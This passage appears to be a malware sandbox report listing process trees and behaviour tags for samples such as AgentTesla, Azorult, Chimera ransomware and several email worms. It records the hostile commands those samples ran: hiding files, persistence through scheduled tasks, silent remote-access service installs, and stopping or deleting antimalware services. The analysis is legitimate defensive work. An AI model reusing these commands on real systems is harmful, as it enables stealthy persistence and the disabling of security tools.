- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7436 /prefetch:1
  2⤵
  PID:2448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
  2⤵
  PID:4312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7860 /prefetch:8
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7484 /prefetch:1
  2⤵
  PID:3080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1408 /prefetch:8
  2⤵
  PID:4516
- C:\Users\Admin\Downloads\AnyDesk.exe
  "C:\Users\Admin\Downloads\AnyDesk.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2008
- C:\Users\Admin\Downloads\AnyDesk.exe
  "C:\Users\Admin\Downloads\AnyDesk.exe"
  2⤵
  - Chimera
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:4420
- - C:\Users\Admin\Downloads\AnyDesk.exe
    "C:\Users\Admin\Downloads\AnyDesk.exe" --local-service
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3404
  - - C:\Users\Admin\Downloads\AnyDesk.exe
      "C:\Users\Admin\Downloads\AnyDesk.exe" --backend
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2928
- - C:\Users\Admin\Downloads\AnyDesk.exe
    "C:\Users\Admin\Downloads\AnyDesk.exe" --local-control
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: AddClipboardFormatListener
    PID:2172
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Music\YOUR_FILES_ARE_ENCRYPTED.HTML"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1836
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1836 CREDAT:17410 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:5256
- C:\Users\Admin\Downloads\AnyDesk.exe
  "C:\Users\Admin\Downloads\AnyDesk.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8036 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7952 /prefetch:1
  2⤵
  PID:2804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:4792

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3052

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x510
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1268

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\The Worst Of All!!!!!!\BonziBUDDY!!!!!!.txt
1⤵
PID:1820

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\AgentTesla.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:660

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4176
- C:\Users\Admin\AppData\Local\Temp\is-FUOM3.tmp\butterflyondesktop.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-FUOM3.tmp\butterflyondesktop.tmp" /SL5="$604A6,2719719,54272,C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:1440
- - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
    "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
    3⤵
    PID:712
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x104,0x124,0x120,0x128,0x7ffb150c46f8,0x7ffb150c4708,0x7ffb150c4718
      4⤵
      PID:1104

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3492

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"
1⤵
PID:4196

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Scare.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5556

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Winevar.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Winevar.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1428
- C:\Windows\SysWOW64\WIN2CC7.pif
  "C:\Windows\system32\WIN2CC7.pif" ~~241315031
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:3464

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Pikachu.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Pikachu.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5956

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\NakedWife.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\NakedWife.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6080

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Prolin.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Prolin.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2188

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4840

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Maldal.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Maldal.a.exe"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:3104

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Mari.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Mari.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2280

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 9.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 9.exe"
1⤵
PID:6988

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe"
1⤵
PID:2564

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 10.exe"
1⤵
PID:7396

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 22.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Email-Worm\Sharoon 22.exe"
1⤵
PID:9660

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"
1⤵
PID:10224
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  PID:7228
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    PID:7516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:8336
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:13160
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:14496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:14128
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        
        PID:12792
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        
        PID:2020
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        
        PID:11788
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:17924
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:8436
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:14716
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:9996
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:18100
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    PID:17112
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  PID:17204
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    PID:10096
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      PID:6516
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      PID:17740
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:9692
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        
        PID:6416
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:8628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:12624
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:11992
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:15796
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        
        PID:19160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:2404
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:6832
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      PID:19292
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        
        PID:14772
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1DBF.tmp\1DC0.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:8708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:15184
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      PID:10296
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        
        PID:2492
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:5228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:7460
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:8612
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:9984
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:13324
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6312
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:12980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      PID:13220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:13740
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:10776
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:17992
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:18504
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:9132
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:15532
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  PID:7204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:9744
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:11660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:10936
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:9292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:6844
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    PID:14592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:15076
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:11244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:15104
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:16640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:9280
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:12292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:9608
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:10520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:11248
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:15772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:5572
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:9308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:7792
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:7496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:10712
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:11820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:11576
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:12340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:6380
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    PID:7296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:7312
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:12992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:16380
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:5240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:13756
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    PID:11504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:16852
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:16188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  PID:15584
